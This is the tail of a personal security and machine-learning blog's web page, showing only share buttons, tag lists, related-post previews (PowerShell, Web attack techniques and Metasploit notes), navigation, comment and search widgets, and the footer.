        <a href="https://twitter.com/intent/tweet?text=%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0%E6%A6%82%E8%AE%BA%20-%20c0ldstudy&url=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2F%25E5%25AE%2589%25E5%2585%25A8%25E7%25AC%2594%25E8%25AE%25B0%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0%E6%A6%82%E8%AE%BA%20-%20c0ldstudy&u=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2F%25E5%25AE%2589%25E5%2585%25A8%25E7%25AC%2594%25E8%25AE%25B0%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://t.me/share/url?url=http%3A%2F%2Fc0ldstudy.github.io%2Fposts%2F%25E5%25AE%2589%25E5%2585%25A8%25E7%25AC%2594%25E8%25AE%25B0%2F&text=%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0%E6%A6%82%E8%AE%BA%20-%20c0ldstudy" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- panel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      















  <div id="access-lastmod" class="post">
    <div class="panel-heading">Recently Updated</div>
    <ul class="post-content pl-0 pb-1 ml-1 mt-2">
      
        
        
        
      <li><a href="/posts/C&W_Attack/">C&W Attack</a></li>
      
        
        
        
      <li><a href="/posts/S&P_2022/">S&P2022</a></li>
      
        
        
        
      <li><a href="/posts/Usenix-2022/">Usenix Security 2022</a></li>
      
        
        
        
      <li><a href="/posts/CCS2022/">CCS 20222 Summary</a></li>
      
        
        
        
      <li><a href="/posts/Coding_Interview/">Coding Interview</a></li>
      
    </ul>
  </div> <!-- #access-lastmod -->



      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/phd/">PhD</a>
    
      
      <a class="post-tag" href="/tags/security/">Security</a>
    
      
      <a class="post-tag" href="/tags/machine-learning/">Machine Learning</a>
    
      
      <a class="post-tag" href="/tags/website/">Website</a>
    
      
      <a class="post-tag" href="/tags/system/">System</a>
    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/conferences/">Conferences</a>
    
      
      <a class="post-tag" href="/tags/design/">Design</a>
    
      
      <a class="post-tag" href="/tags/network/">Network</a>
    
      
      <a class="post-tag" href="/tags/skills/">Skills</a>
    

    </div>
  </div>


    </div>

    
      
      



  <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
    <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
    <nav id="toc"></nav>
  </div>

  <!-- toc.js will be loaded at medium priority -->
  <script src="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.js"></script>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->





  <div id="related-posts" class="mb-2 mb-sm-4">
    <h3 class="pt-2 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/powershell_cookbook/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1492412400"
    data-df="ll"
    >
  Apr 17, 2017
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>powershell cookbook</h3>
            <div class="text-muted small">
              <p>
                





                1.使用指南

1.1运行脚本（调用操作：命令名中包含空格）

&amp;amp; &#39;C:\Program Files\Program.exe&#39; arguments
当前目录下：.\Program.exe arguments


1.3配置文件

Prompt()函数


1.4帮助

Get-Command/Get-Help


1.7命令转化为Base64编码

$commands = &#39;1.....
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B02/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1510387200"
    data-df="ll"
    >
  Nov 11, 2017
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>安全笔记--Web攻击技术</h3>
            <div class="text-muted small">
              <p>
                





                2 Web攻击技术
2.1 Web漏洞概述


  OWASP(Opwn Web Application Security Project)
    
      owaspbwa
    
  
  注入
  失效的身份认证和会话管理
    
      Padding Oracle会话管理漏洞研究一波
        
          对称加密 + CBC
        
   ...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/Metasploit/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1521356400"
    data-df="ll"
    >
  Mar 18, 2018
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Metasploit</h3>
            <div class="text-muted small">
              <p>
                





                
Metasploit渗透测试魔鬼训练营

诸葛建伟 陈力波 孙松柏 等著

1. 基础知识

1.1 Metasploit使用接口：msfgui, msfconsole, msfcli。（最新kali2018只含有msfconsole）

2. 渗透测试实验环境

深入理解

3. 情报搜集技术

3.1 注册信息查询


  whois：查询域名注册信息数据库
  nslookup：从D...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/%E9%98%BF%E9%87%8C%E4%BA%91ubuntu%E9%85%8D%E7%BD%AEFTP%E6%9C%8D%E5%8A%A1%E5%99%A8/" class="btn btn-outline-primary"
    prompt="Older">
    <p>阿里云ubuntu配置FTP服务器</p>
  </a>
  

  
  <a href="/posts/MongoDB/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>MongoDB自学笔记</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->

  
  <!-- The Disqus lazy loading. -->
<div id="disqus_thread" class="pt-2 pb-2">
  <p class="text-center text-muted small">Comments powered by <a href="https://disqus.com/">Disqus</a>.</p>
</div>

<script type="text/javascript">
  var disqus_config = function () {
    this.page.url = 'http://c0ldstudy.github.io/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/';
    this.page.identifier = '/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/';
  };

  /* Lazy loading */
  var disqus_observer = new IntersectionObserver(
    function (entries) {
      if (entries[0].isIntersecting) {
        (function () {
          var d = document,
            s = d.createElement('script');
          s.src = 'https://c0ldstudy.disqus.com/embed.js';
          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();

        disqus_observer.disconnect();
      }
    },
    { threshold: [0] }
  );

  disqus_observer.observe(document.querySelector('#disqus_thread'));

  /* Auto switch theme */
  function reloadDisqus() {
    if (event.source === window && event.data && event.data.direction === ModeToggle.ID) {
      /* Disqus hasn't been loaded */
      if (typeof DISQUS === 'undefined') {
        return;
      }

      if (document.readyState == 'complete') {
        DISQUS.reset({ reload: true, config: disqus_config });
      }
    }
  }

  if (document.querySelector('.mode-toggle')) {
    window.addEventListener('message', reloadDisqus);
  }
</script>



    
  </div>
</div>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/phd/">PhD</a>
    
      
      <a class="post-tag" href="/tags/security/">Security</a>
    
      
      <a class="post-tag" href="/tags/machine-learning/">Machine Learning</a>
    
      
      <a class="post-tag" href="/tags/website/">Website</a>
    
      
      <a class="post-tag" href="/tags/system/">System</a>
    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/conferences/">Conferences</a>
    
      
      <a class="post-tag" href="/tags/design/">Design</a>
    
      
      <a class="post-tag" href="/tags/network/">Network</a>
    
      
      <a class="post-tag" href="/tags/skills/">Skills</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    <!-- The Footer -->

<footer>
    <div class="container pl-lg-4 pr-lg-4">
      <div hidden>
        <div class="github_chart">
          <img src="http://ghchart.rshah.org/409ba5/C0ldstudy" alt="C0ldstudy's Blue Github chart"/>
          <script type='text/javascript' id='clustrmaps' src='//cdn.clustrmaps.com/map_v2.js?cl=ffffff&w=300&t=tt&d=PWaejm3rz2TG6HOtwcekX2kM9kPWz2aP6GYhuOVoNpA'></script>
        </div>
      </div>

        <div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3">
        <div class="footer-left">
          <p class="mb-0">
            © 2023
            <a href="https://twitter.com/JiacenXu">Jiacen (Jason) Xu</a>.
            
            <span data-toggle="tooltip" data-placement="top"
              title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
            
          </p>
        </div>

        <!-- <script  type="text/javascript" id="clustrmaps" src="//clustrmaps.com/map_v2.js?d=PWaejm3rz2TG6HOtwcekX2kM9kPWz2aP6GYhuOVoNpA&cl=ffffff&w=a"></script> -->
        <div class="footer-right">
          <p class="mb-0">Using the <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> theme <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>.
          </p>
        </div>
      </div>
    </div>
  </footer>


    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    
      <div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true"
        data-animation="true" data-autohide="false">
        <div class="toast-header">
          <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="toast-body text-center pt-0">
          <p class="pl-2 pr-2 mb-3">A new version of content is available.</p>
          <button type="button" class="btn btn-primary" aria-label="Update">
            Update
          </button>
        </div>
      </div>
    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!-- JS selector for site. -->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/lazysizes@5.3.2/lazysizes.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js"></script>





  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1.11.6/dayjs.min.js,npm/dayjs@1.11.6/locale/en.min.js,npm/dayjs@1.11.6/plugin/relativeTime.min.js,npm/dayjs@1.11.6/plugin/localizedFormat.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

